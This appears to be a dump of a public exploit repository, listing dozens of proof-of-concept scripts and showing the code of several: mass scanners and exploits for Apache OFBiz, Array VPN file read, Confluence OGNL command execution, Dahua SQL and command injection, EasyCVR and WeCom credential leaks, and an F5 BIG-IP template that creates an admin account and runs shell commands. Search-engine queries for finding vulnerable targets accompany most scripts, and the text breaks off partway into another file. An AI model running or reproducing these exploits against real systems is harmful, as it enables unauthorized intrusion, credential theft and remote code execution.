├── .DS_Store
├── Apache_OFBiz_Authentication_Bypass_Rce.py
├── Array_VPN_FileRead_Poc.py
├── Atlassian_Confluence_text-inline_Rce_Poc.py
├── ChangJieTongTPlus_GetStoreWarehouseByStore_Rce_Poc.py
├── DaHua_Zhihuiyuanqu_getFaceCapture_Sql_Poc.py
├── Dahua_EIMS_captureCommand_Rce.py
├── EasyCVR_Userlist_Leak_Poc.py
├── Enterprise_VX_Infoleak_Exp.py
├── F5_BIG_IP_RCE_CVE-2023-46747.yaml
├── Feiqihulian_FE_Login_Bypass_Exp.py
├── Hikvison_IP_Duijiang_Ping_Rce.py
├── Hikvison_Showfile_Download_File_Poc.py
├── Hikvison_iSecure_Center_Report_Upload_File_Poc.py
├── Hikvison_iSecure_Center_ResourceOperations_Upload_File_Exp.py
├── Hikvison_iSecure_Center_ResourceOperations_Upload_File_Poc.py
├── Hongfan_OA_Ioffice_Udfmr_Sql_Poc.py
├── Hongjing_HCM_Codesettree_Sql_Poc.py
├── Hongjing_HCM_KhFieldtree_Sql_Poc.py
├── JeecgBoot_testConnection_Rce.py
├── JinHE_OA_SQL_Rce_Exp.py
├── Jinpan_Weixin_Getsysteminfo_Leak_Poc.py
├── Kingdee_Apusic_AppServer_Upload_File_Poc.py
├── Kingdee_Erp_Unserialize_Rce_Poc.py
├── Kingdee_ScpSupRegHandler_Upload_File_Poc.py
├── LICENSE
├── Landray_Oa_Custom_FileRead_Poc.py
├── Landray_Oa_Treexml_Rce_Poc.py
├── Likeshop_Formimage_Uploadfile_poc.py
├── Linkwalks_OA_GetIMDictionary_Sql_Poc.py
├── Linkwalks_OA_Msgbroadcastuploadfile_UploadFile_Exp.py
├── Metabase_RCE_CVE_2023_38646_poc.py
├── Nginx_WebUI_Runcmd_Rce_Exp.py
├── NsFocus_SAS_Exec_Rce_Poc.py
├── NsFocus_SAS_GetFile_FileRead_Poc.py
├── NsFocus_SAS_LocalUser_Login_Poc.py
├── Openfire_Bypass_CVE_2023_32315_poc.py
├── PigCMS_Action_FlashUpload_UploadFile_Poc.py
├── QAX_Sec3600_Firewall_UploadFile_Poc.py
├── Qiwangzhizao_ERP_Comboxstore_Rce_Poc.py
├── README.md
├── Renwoxing_CRM_Typeid_sql_Poc.py
├── RichMail_noCookiesMail_info_Leak_Poc.py
├── Ruijie_NBR_FileUpload_Poc.py
├── Ruijie_SmartWeb_Execshell_Leak_Poc.py
├── Sifudi_test_qrcode_b_Rce_Poc.py
├── Suda_Report_FileUpload_Poc.py
├── Video_cloud_pla_download.aspx-anyfile-CNVD-2022-91381.yaml
├── Weaver_E_Mobile_6_RCE_Exp.py
├── Weaver_Oa_Eoffice_Officeserver_Upload_File_Poc.py
├── Weaver_Oa_Eoffice_Uploadify_Upload_File_Poc.py
├── XXL_Job_Default_Token_Rce.py
├── Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py
├── Yongyou_KSOA_QueryService_Sql_Poc.py
├── Yongyou_NC_Cloud_Uploadchunk_Uploadfile_Poc.py
├── Yongyou_NC_Cloud_importhttpscer_FileUpload_Poc.py
├── Yongyou_U8_OA_doUpload_Upload_File_Poc.py
├── YouDianCMS__Upload_File_Poc.py
└── image
    ├── .DS_Store
    └── README
        ├── 1691885589911.png
        ├── 公众号.png
        └── 猫蛋儿微信.jpeg


/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MD-SEC/MDPOCS/4de61fc965525a3f6af6049ef28d0b1619a649c1/.DS_Store


--------------------------------------------------------------------------------
/Apache_OFBiz_Authentication_Bypass_Rce.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="Apache_OFBiz"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 Apache_OFBiz_Authentication_Bypass_Rce.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | def poc(host):
29 |     if "http" in host:
30 |         url = host
31 |     else:
32 |         url ="http://"+host
33 |     host1=url.replace("http://","")
34 |     host2=host1.replace("https://","")
35 |     headers = {
36 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
37 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
38 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
39 |         "Accept-Encoding": "gzip, deflate,br",
40 |         "Host": "%s" % host2  
41 |     }
42 |     vulurl = url+ "/webtools/control/ping?USERNAME&PASSWORD=&requirePasswordChange=Y"
43 |     try:
44 |         r = requests.get(vulurl, headers=headers)
45 |         if "PONG" in r.text:
46 |             print(url+":true")
47 |         else:
48 |             return 0
49 |             print (host+":false")
50 |     except:
51 |         pass
52 |         #print (host+":false")
53 | 
54 | if __name__ == '__main__':
55 |     file = sys.argv[1]
56 |     data = open(file)
57 |     reader = csv.reader(data)
58 |     with ThreadPoolExecutor(50) as pool:
59 |         for row in reader:
60 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Array_VPN_FileRead_Poc.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python3
  2 | # -*- coding:utf-8 -*-
  3 | # author:MDSEC
  4 | # from:https://github.com/MD-SEC/MDPOCS
  5 | #fofa：product="Array-VPN"
  6 | #zoomeye:app:"Array Networks secure access gateways VPN server httpd" +country:"CN"
  7 | import poplib
  8 | from HackRequests import *
  9 | 
 10 | import sys
 11 | import requests
 12 | import csv
 13 | import urllib3
 14 | import hashlib
 15 | from concurrent.futures import ThreadPoolExecutor
 16 | import ssl
 17 | 
 18 | 
 19 | # if len(sys.argv) != 2:
 20 | #     print(
 21 | #         '+----------------------------------------------------------------------------------------------------------+')
 22 | #     print(
 23 | #         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
 24 | #     print(
 25 | #         '+----------------------------------------------------------------------------------------------------------+')
 26 | #     print(
 27 | #         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
 28 | #     print(
 29 | #         '+ EXP: python3 Array_VPN_FileRead_Poc.py url.txt                                               +')
 30 | #     print(
 31 | #         '+----------------------------------------------------------------------------------------------------------+')
 32 | #     sys.exit()
 33 | # requests.packages.urllib3.disable_warnings()
 34 | 
 35 | # def exp(host):
 36 | #     if "http" in host:
 37 | #         url = host
 38 | #     else:
 39 | #         url ="http://"+host
 40 | #     host1=url.replace("http://","")
 41 | #     host2=host1.replace("https://","")
 42 | #     headers = {
 43 | #         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
 44 | #         "Sec-Fetch-Mode": "no-cors",
 45 | #         "Host": "%s" %host2,
 46 | #         "Sec-Ch-Ua": '"Chromium";v="103", ".Not/A)Brand";v="99"',
 47 | #         "Accept": "*/*",
 48 | #         "Accept-Encoding": "gzip, deflate",
 49 | #         "Sec-Fetch-Dest": "script",
 50 | #         "Sec-Ch-Ua-Platform": "\"Windows\"",
 51 | #         "Sec-Fetch-Mode": "no-cors",
 52 | #         "X_AN_FILESHARE": "uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd"
 53 | #     }
 54 | #     raw='''GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
 55 | # User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
 56 | # Accept-Encoding: gzip, deflate, br
 57 | # Accept: */*
 58 | # Connection: close
 59 | # Sec-Fetch-Mode: no-cors
 60 | # Host: 223.255.133.5
 61 | # Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
 62 | # Sec-Fetch-Dest: script
 63 | # Sec-Ch-Ua-Platform: "Windows"
 64 | # X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd'''
 65 | #     vulurl=url+"/prx/000/http/localhost/client_sec/%00../../../addfolder"
 66 | #     try:
 67 | #         uu = hackRequests().http(vulurl, headers=headers)
 68 | #         print(uu.text())
 69 | #     except  Exception as e:
 70 | #         print (e)
 71 | #         print (host+":false")
 72 | # if __name__ == '__main__':
 73 | #     file = sys.argv[1]
 74 | #     data = open(file)
 75 | #     reader = csv.reader(data)
 76 | #     with ThreadPoolExecutor(50) as pool:
 77 | #         for row in reader:
 78 | #             pool.submit(exp, row[0])
 79 | proxysdata = {
 80 | 'https': '127.0.0.1:8082'
 81 | }
 82 | requests.packages.urllib3.disable_warnings()
 83 | def exp(host):
 84 |     if "http" in host:
 85 |         url = host
 86 |     else:
 87 |         url ="http://"+host
 88 |     host1=url.replace("http://","")
 89 |     host2=host1.replace("https://","")
 90 |     headers = {
 91 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
 92 |         "Sec-Fetch-Mode": "no-cors",
 93 |         "Host": "%s" %host2,
 94 |         "Sec-Ch-Ua": '"Chromium";v="103", ".Not/A)Brand";v="99"',
 95 |         "Accept": "*/*",
 96 |         "Accept-Encoding": "gzip, deflate",
 97 |         "Sec-Fetch-Dest": "script",
 98 |         "Sec-Ch-Ua-Platform": "\"Windows\"",
 99 |         "Sec-Fetch-Mode": "no-cors",
100 |         "X_AN_FILESHARE": "uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd"
101 |     }
102 |     vulurl=url+"""/prx/000/http/localhost/client_sec/%25%30%30%2e%2e%2f%2e%2e%2f%2e%2e%2f%61%64%64%66%6f%6c%64%65%72"""
103 |     try:
104 |         r=requests.get(vulurl,headers=headers,verify=False)
105 |         if "arraydb" in r.text:
106 |             print(url+":true     "+r.text[r.text.find('root'):r.text.find('sh')+2])
107 |     except  Exception as e:
108 |         return 0
109 |         print (e)
110 |         print (host+":false")
111 | if __name__ == '__main__':
112 |     file = sys.argv[1]
113 |     data = open(file)
114 |     reader = csv.reader(data)
115 |     with ThreadPoolExecutor(50) as pool:
116 |         for row in reader:
117 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Atlassian_Confluence_text-inline_Rce_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa:app="Atlassian-Confluence"
 6 | # 
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | 
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
20 |     print(
21 |         '+---------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
24 |     print(
25 |         '+ EXP: python3 Atlassian_Confluence_text-inline_Rce_Poc.py url.txt                                         +')
26 |     print(
27 |         '+----------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | urllib3.disable_warnings()
30 | def poc(host):
31 |     if "http" in host:
32 |         url = host
33 |     else:
34 |         url ="http://"+host
35 |     host1=url.replace("http://","")
36 |     host2=host1.replace("https://","")
37 |     headers = {
38 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
39 |         "Accept-Encoding": "gzip,deflate",
40 |         "Accept":"*/*",
41 |         "Connection":"close",
42 |         "Content-Type": "application/x-www-form-urlencoded",
43 |         "Host":"%s" % host2
44 | 
45 |     }
46 |     vulurl = url + "/template/aui/text-inline.vm"
47 |     data=r"label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader('Cmd',(new+freemarker.template.utility.Execute()).exec({'id'}))"
48 |     try:
49 |         r = requests.post(vulurl, headers=headers,data=data,verify=False)
50 |         if r.status_code==200 and "Cmd" in str(r.headers) :
51 |             print(url+" id:" + r.headers['Cmd'])
52 |         else:
53 |             return 0
54 |             print (host+":false")
55 |     except:
56 |         return 0
57 | 
58 |         print (host+":false")
59 | 
60 | if __name__ == '__main__':
61 |     file = sys.argv[1]
62 |     data = open(file)
63 |     reader = csv.reader(data)
64 |     with ThreadPoolExecutor(50) as pool:
65 |         for row in reader:
66 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/ChangJieTongTPlus_GetStoreWarehouseByStore_Rce_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="畅捷通-TPlus" && icon_hash="-2067519629"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 ChangJieTongTPlus_GetStoreWarehouseByStore_Rce_Poc.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | }  
31 | def poc(host):
32 |     url = host
33 |     headers = {
34 |         "X-Ajaxpro-Method": "GetStoreWarehouseByStore",
35 |         "Host":"%s" %host   
36 |     }
37 |     data ='{\r\n"storeID":{}\r\n}'
38 |     vulurl = "http://"+url + "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore"
39 |     try:
40 |         
41 |         r = requests.post(vulurl, headers=headers,data=data)
42 |         print(r.text)
43 |         if r.status_code==200 and "archivesId" in r.text :
44 |             print("http://"+host+":true")
45 |             print("请使用ysoserial进行反序列化利用:https://blog.csdn.net/qq_41904294/article/details/131350965")
46 |         else:
47 |             return 0
48 |             print (host+":false")
49 |     except:
50 |         print (host+":false")
51 | 
52 | 
53 | if __name__ == '__main__':
54 |     file = sys.argv[1]
55 |     data = open(file)
56 |     reader = csv.reader(data)
57 |     with ThreadPoolExecutor(50) as pool:
58 |         for row in reader:
59 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/DaHua_Zhihuiyuanqu_getFaceCapture_Sql_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="dahua-智慧园区综合管理平台"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+---------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
23 |     print(
24 |         '+ EXP: python3 DaHua_Zhihuiyuanqu_getFaceCapture_Sql_Poc.py url.txt                                        +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | requests.packages.urllib3.disable_warnings()
29 | def poc(host):
30 |     if "http" in host:
31 |         url = host
32 |     else:
33 |         url ="http://"+host
34 |     host1=url.replace("http://","")
35 |     host2=host1.replace("https://","")
36 |     headers = {
37 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
38 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
39 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
40 |         "Accept-Encoding": "gzip, deflate",
41 |         "Host":"%s" % host2
42 |     }
43 |     vulurl = url + '/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B"orderBy":"1%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--"%7D/extend/%7B%7D'
44 |     try:
45 |         r = requests.get(vulurl, headers=headers,verify=False)
46 |         #print(str(r.content))
47 |         if  "XPATH" in str(r.content):
48 |             index=str(r.content).find("XPATH")
49 |             print("http://"+host+" :true   "+str(r.content)[index+23:index+38])
50 |         else:
51 |             return 0
52 |             print (host+":false")
53 |     except:
54 |         return 0
55 |         print (host+":false")
56 | 
57 | 
58 | if __name__ == '__main__':
59 |     file = sys.argv[1]
60 |     data = open(file)
61 |     reader = csv.reader(data)
62 |     with ThreadPoolExecutor(50) as pool:
63 |         for row in reader:
64 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Dahua_EIMS_captureCommand_Rce.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa: app="dahua-EIMS"
 6 | # Zoomeye: app:"大华 EIMS"
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | 
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
20 |     print(
21 |         '+----------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
24 |     print(
25 |         '+ EXP: python3 Dahua_EIMS_captureCommand_Rce.py url.txt                                                       +')
26 |     print(
27 |         '+----------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | proxysdata = {
30 | 'http': '127.0.0.1:8080'
31 | } 
32 | def poc(host):
33 |     url = host
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
43 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
44 |         "Accept-Encoding": "gzip, deflate",
45 |         "Accept":"*/*",
46 |         "Host":"%s" %host2
47 |     }
48 |     vulurl = url + "/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping xxx.dnslog.cn index.pcap"
49 |     try:
50 |         r = requests.get(vulurl, headers=headers)
51 |         if r.status_code==200 and "success" in r.text :
52 |             #print(host)
53 |             print( host2+":true ")
54 |         else:
55 |             return 0
56 |             print (host+":false")
57 |     except:
58 |         pass
59 |         #print (host+":false")
60 | 
61 | 
62 | if __name__ == '__main__':
63 |     file = sys.argv[1]
64 |     data = open(file)
65 |     reader = csv.reader(data)
66 |     with ThreadPoolExecutor(50) as pool:
67 |         for row in reader:
68 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/EasyCVR_Userlist_Leak_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa:icon_hash="458134656"
 6 | 
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | 
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
20 |     print(
21 |         '+----------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
24 |     print(
25 |         '+ EXP: python3 EasyCVR_Userlist_Leak_Poc.py url.txt                                               +')
26 |     print(
27 |         '+----------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | proxysdata = {
30 | 'http': '127.0.0.1:8081'
31 | }  
32 | requests.packages.urllib3.disable_warnings()
33 | 
34 | def exp(host):
35 |     if "http" in host:
36 |         url = host
37 |     else:
38 |         url ="http://"+host
39 |     host1=url.replace("http://","")
40 |     host2=host1.replace("https://","")
41 |     headers = {
42 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
43 |         "Pragma": "no-cache",
44 |         "Cache-Control": "no-cache",
45 |         "Upgrade-Insecure-Requests": "1",
46 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
47 |         "Accept-Encoding": "gzip, deflate, br",
48 |         "Cookie": "token=WfP815MSR"
49 |     }
50 |     vulurl = url + "/api/v1/userlist?pageindex=0&pagesize=10"
51 |     try:
52 |         r = requests.get(vulurl,headers=headers,verify=False)
53 |         #print(r.text)
54 |         if "Password" and "CreateAt" in r.text :
55 |             print(url+":true")
56 |             #print(r.text)     
57 |         else:
58 |             return 0
59 |             print (host+":false")
60 |     except:
61 |         return 0
62 |         print (host+":false")
63 | 
64 | if __name__ == '__main__':
65 |     file = sys.argv[1]
66 |     data = open(file)
67 |     reader = csv.reader(data)
68 |     with ThreadPoolExecutor(50) as pool:
69 |         for row in reader:
70 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Enterprise_VX_Infoleak_Exp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # product="Tencent-企业微信"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 Enterprise_VX_Infoleak_Exp.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | def poc(host):
29 |     url = host
30 |     headers = {
31 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
32 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
33 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
34 |         "Accept-Encoding": "gzip, deflate",
35 |         "Host": "%s" % host  
36 |     }
37 |     vulurl = "https://"+url + "/cgi-bin/gateway/agentinfo"
38 |     try:
39 |         r = requests.get(vulurl, headers=headers)
40 |         if r.status_code==200 and "strcorpid" in r.text and "\"errcode\":0" in r.text:
41 |             strcorpid = r.text.replace('\"',"").replace('{',"").replace('}',"").split('strcorpid:')[1].split(",corpid")[0]
42 |             Secret = r.text.replace('\"',"").replace('{',"").replace('}',"").split('Secret:')[1].split(",}")[0]
43 |             print("http://"+host+":true")
44 |             print("strcotpid= "+ strcorpid)
45 |             print("Secret= "+ Secret)
46 |         else:
47 |             return 0
48 |             print (host+":false")
49 |     except:
50 |         print (host+":false")
51 | 
52 | if __name__ == '__main__':
53 |     file = sys.argv[1]
54 |     data = open(file)
55 |     reader = csv.reader(data)
56 |     with ThreadPoolExecutor(50) as pool:
57 |         for row in reader:
58 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/F5_BIG_IP_RCE_CVE-2023-46747.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2023-46747
 2 | 
 3 | info:
 4 |   name: F5 BIG-IP - Unauthenticated RCE via AJP Smuggling
 5 |   author: iamnoooob,rootxharsh,pdresearch
 6 |   severity: critical
 7 |   description: |
 8 |     CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.
 9 |   reference:
10 |     - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
11 |     - https://my.f5.com/manage/s/article/K000137353
12 |   classification:
13 |     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
14 |     cvss-score: 9.8
15 |     cve-id: CVE-2023-46747
16 |     cwe-id: CWE-288
17 |     epss-score: 0.00091
18 |     epss-percentile: 0.38535
19 |   metadata:
20 |     max-request: 4
21 |     verified: true
22 |     shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
23 |   tags: cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive
24 | 
25 | variables:
26 |   username: "{{hex_encode(rand_base(5))}}"
27 |   password: "{{hex_encode(rand_base(12))}}"
28 |   password2: "{{rand_base(14)}}"
29 | 
30 | http:
31 |   - raw:
32 |       - |+
33 |         POST /tmui/login.jsp HTTP/1.1
34 |         Host: {{Hostname}}
35 |         Transfer-Encoding: chunked, chunked
36 |         Content-Type: application/x-www-form-urlencoded
37 | 
38 |         204
39 |         {{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}
40 |         0
41 | 
42 |     unsafe: true
43 | 
44 |   - raw:
45 |       - |+
46 |         PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
47 |         Host: {{Hostname}}
48 |         Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
49 |         Content-Type: application/json
50 | 
51 |         {"password": "{{password2}}"}
52 | 
53 |       - |+
54 |         POST /mgmt/shared/authn/login HTTP/1.1
55 |         Host: {{Hostname}}
56 |         Content-Type: application/json
57 | 
58 |         {"username":"{{hex_decode(username)}}", "password":"{{password2}}"}
59 | 
60 |       - |+
61 |         POST /mgmt/tm/util/bash HTTP/1.1
62 |         Host: {{Hostname}}
63 |         X-F5-Auth-Token: {{token}}
64 |         Content-Type: application/json
65 | 
66 |         {"command":"run","utilCmdArgs":"-c id"}
67 | 
68 |     extractors:
69 |       - type: regex
70 |         part: body_2
71 |         name: token
72 |         group: 1
73 |         regex:
74 |           - "([A-Z0-9]{26})"
75 |         internal: true
76 | 
77 |       - type: regex
78 |         part: body_3
79 |         group: 1
80 |         regex:
81 |           - "\"commandResult\":\"(.*)\""
82 | 
83 |       - type: dsl
84 |         dsl:
85 |           - '"Username:" + hex_decode(username)'
86 |           - '"Password:" + password2'
87 |           - '"Token:" + token'
88 | 
89 |     matchers:
90 |       - type: word
91 |         words:
92 |           - "commandResult"
93 |           - "uid="
94 |         condition: and
95 | # digest: 4a0a00473045022071bddfdc0bbe5945fe7829cf34774237e719b64db2c477cec65bb4da57c9b44c022100e15fe5b919285d7b4c1b1c8c403422d0319c7b6269dc6143f5daad3b9f102655:922c64590222798bb761d5b6d8e72950


--------------------------------------------------------------------------------
/Feiqihulian_FE_Login_Bypass_Exp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
